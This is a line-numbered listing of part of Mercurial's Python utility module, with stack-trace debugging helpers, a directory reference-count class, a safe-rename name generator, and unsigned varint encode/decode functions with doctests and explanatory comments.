3132 3132 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3133 3133 '''Yields lines for a nicely formatted stacktrace.
3134 3134 Skips the 'skip' last entries, then returns the last 'depth' entries.
3135 3135 Each file+linenumber is formatted according to fileline.
3136 3136 Each line is formatted according to line.
3137 3137 If line is None, it yields:
3138 3138 length of longest filepath+line number,
3139 3139 filepath+linenumber,
3140 3140 function
3141 3141
3142 3142 Not to be used in production code, but very convenient while developing.
3143 3143 '''
3144 3144 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3145 3145 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3146 3146 ][-depth:]
3147 3147 if entries:
3148 3148 fnmax = max(len(entry[0]) for entry in entries)
3149 3149 for fnln, func in entries:
3150 3150 if line is None:
3151 3151 yield (fnmax, fnln, func)
3152 3152 else:
3153 3153 yield line % (fnmax, fnln, func)
3154 3154
3155 3155 def debugstacktrace(msg='stacktrace', skip=0,
3156 3156 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3157 3157 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3158 3158 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3159 3159 By default it will flush stdout first.
3160 3160 It can be used everywhere and intentionally does not require an ui object.
3161 3161 Not to be used in production code, but very convenient while developing.
3162 3162 '''
3163 3163 if otherf:
3164 3164 otherf.flush()
3165 3165 f.write('%s at:\n' % msg.rstrip())
3166 3166 for line in getstackframes(skip + 1, depth=depth):
3167 3167 f.write(line)
3168 3168 f.flush()
3169 3169
3170 3170 class dirs(object):
3171 3171 '''a multiset of directory names from a dirstate or manifest'''
3172 3172
3173 3173 def __init__(self, map, skip=None):
3174 3174 self._dirs = {}
3175 3175 addpath = self.addpath
3176 3176 if isinstance(map, dict) and skip is not None:
3177 3177 for f, s in map.iteritems():
3178 3178 if s[0] != skip:
3179 3179 addpath(f)
3180 3180 elif skip is not None:
3181 3181 raise error.ProgrammingError("skip character is only supported "
3182 3182 "with a dict source")
3183 3183 else:
3184 3184 for f in map:
3185 3185 addpath(f)
3186 3186
3187 3187 def addpath(self, path):
3188 3188 dirs = self._dirs
3189 3189 for base in finddirs(path):
3190 3190 if base in dirs:
3191 3191 dirs[base] += 1
3192 3192 return
3193 3193 dirs[base] = 1
3194 3194
3195 3195 def delpath(self, path):
3196 3196 dirs = self._dirs
3197 3197 for base in finddirs(path):
3198 3198 if dirs[base] > 1:
3199 3199 dirs[base] -= 1
3200 3200 return
3201 3201 del dirs[base]
3202 3202
3203 3203 def __iter__(self):
3204 3204 return iter(self._dirs)
3205 3205
3206 3206 def __contains__(self, d):
3207 3207 return d in self._dirs
3208 3208
3209 3209 if safehasattr(parsers, 'dirs'):
3210 3210 dirs = parsers.dirs
3211 3211
3212 3212 if rustdirs is not None:
3213 3213 dirs = rustdirs
3214 3214
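# Usage sketch of the dirs multiset (the Python, C and Rust variants
# share this interface; the paths are invented):
#
#   >>> d = dirs([b'a/b/c', b'a/b/d'])
#   >>> b'a/b' in d
#   True
#   >>> d.delpath(b'a/b/c')
#   >>> b'a/b' in d          # still referenced by a/b/d
#   True
#   >>> d.delpath(b'a/b/d')
#   >>> b'a/b' in d          # reference count dropped to zero
#   False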
3215 3215 def finddirs(path):
3216 3216 pos = path.rfind('/')
3217 3217 while pos != -1:
3218 3218 yield path[:pos]
3219 3219 pos = path.rfind('/', 0, pos)
3220 3220 yield ''
3221 3221
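# For reference, a sketch of finddirs output (the path is invented):
# list(finddirs(b'a/b/c')) yields ['a/b', 'a', ''] -- every proper
# ancestor directory, ending with the repository root ''.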
3222 3222
3223 3223 # convenient shortcut
3224 3224 dst = debugstacktrace
3225 3225
3226 3226 def safename(f, tag, ctx, others=None):
3227 3227 """
3228 3228 Generate a name that is safe to rename f to in the given context.
3229 3229
3230 3230 f: filename to rename
3231 3231 tag: a string tag that will be included in the new name
3232 3232 ctx: a context, in which the new name must not exist
3233 3233 others: a set of other filenames that the new name must not be in
3234 3234
3235 3235 Returns a file name of the form oldname~tag[~number] which does not exist
3236 3236 in the provided context and is not in the set of other names.
3237 3237 """
3238 3238 if others is None:
3239 3239 others = set()
3240 3240
3241 3241 fn = '%s~%s' % (f, tag)
3242 3242 if fn not in ctx and fn not in others:
3243 3243 return fn
3244 3244 for n in itertools.count(1):
3245 3245 fn = '%s~%s~%s' % (f, tag, n)
3246 3246 if fn not in ctx and fn not in others:
3247 3247 return fn
3248 3248
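# Sketch: a plain set can stand in for the context, since only
# membership tests are performed (the names are invented):
#
#   >>> taken = {b'f~orig', b'f~orig~1'}
#   >>> safename(b'f', b'orig', taken)
#   'f~orig~2'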
3249 3249 def readexactly(stream, n):
3250 3250 '''read n bytes from stream.read and abort if fewer were available'''
3251 3251 s = stream.read(n)
3252 3252 if len(s) < n:
3253 3253 raise error.Abort(_("stream ended unexpectedly"
3254 3254 " (got %d bytes, expected %d)")
3255 3255 % (len(s), n))
3256 3256 return s
3257 3257
3258 3258 def uvarintencode(value):
3259 3259 """Encode an unsigned integer value to a varint.
3260 3260
3261 3261 A varint is a variable length integer of 1 or more bytes. Each byte
3262 3262 except the last has the most significant bit set. The lower 7 bits of
3263 3263 each byte store the 2's complement representation, least significant group
3264 3264 first.
3265 3265
3266 3266 >>> uvarintencode(0)
3267 3267 '\\x00'
3268 3268 >>> uvarintencode(1)
3269 3269 '\\x01'
3270 3270 >>> uvarintencode(127)
3271 3271 '\\x7f'
3272 3272 >>> uvarintencode(1337)
3273 3273 '\\xb9\\n'
3274 3274 >>> uvarintencode(65536)
3275 3275 '\\x80\\x80\\x04'
3276 3276 >>> uvarintencode(-1)
3277 3277 Traceback (most recent call last):
3278 3278 ...
3279 3279 ProgrammingError: negative value for uvarint: -1
3280 3280 """
3281 3281 if value < 0:
3282 3282 raise error.ProgrammingError('negative value for uvarint: %d'
3283 3283 % value)
3284 3284 bits = value & 0x7f
3285 3285 value >>= 7
3286 3286 bytes = []
3287 3287 while value:
3288 3288 bytes.append(pycompat.bytechr(0x80 | bits))
3289 3289 bits = value & 0x7f
3290 3290 value >>= 7
3291 3291 bytes.append(pycompat.bytechr(bits))
3292 3292
3293 3293 return ''.join(bytes)
3294 3294
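# Worked example for 1337 (0b101_0011_1001), matching the doctest above:
#   low 7 bits  = 0b0111001 (0x39); more groups follow, so emit
#                 0x80 | 0x39 = 0xb9
#   next 7 bits = 0b0001010 (0x0a); final group, emitted bare ('\n')
# hence uvarintencode(1337) == '\xb9\n'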
3295 3295 def uvarintdecodestream(fh):
3296 3296 """Decode an unsigned variable length integer from a stream.
3297 3297
3298 3298 The passed argument is anything that has a ``.read(N)`` method.
3299 3299
3300 3300 >>> try:
3301 3301 ... from StringIO import StringIO as BytesIO
3302 3302 ... except ImportError:
3303 3303 ... from io import BytesIO
3304 3304 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3305 3305 0
3306 3306 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3307 3307 1
3308 3308 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3309 3309 127
3310 3310 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3311 3311 1337
3312 3312 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3313 3313 65536
3314 3314 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3315 3315 Traceback (most recent call last):
3316 3316 ...
3317 3317 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3318 3318 """
3319 3319 result = 0
3320 3320 shift = 0
3321 3321 while True:
3322 3322 byte = ord(readexactly(fh, 1))
3323 3323 result |= ((byte & 0x7f) << shift)
3324 3324 if not (byte & 0x80):
3325 3325 return result
3326 3326 shift += 7
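# Round-trip sanity sketch (io.BytesIO stands in for any object with a
# .read(N) method; the sample values are arbitrary):
#
#   >>> from io import BytesIO
#   >>> all(uvarintdecodestream(BytesIO(uvarintencode(n))) == n
#   ...     for n in (0, 1, 127, 128, 1337, 65536, 2**63))
#   True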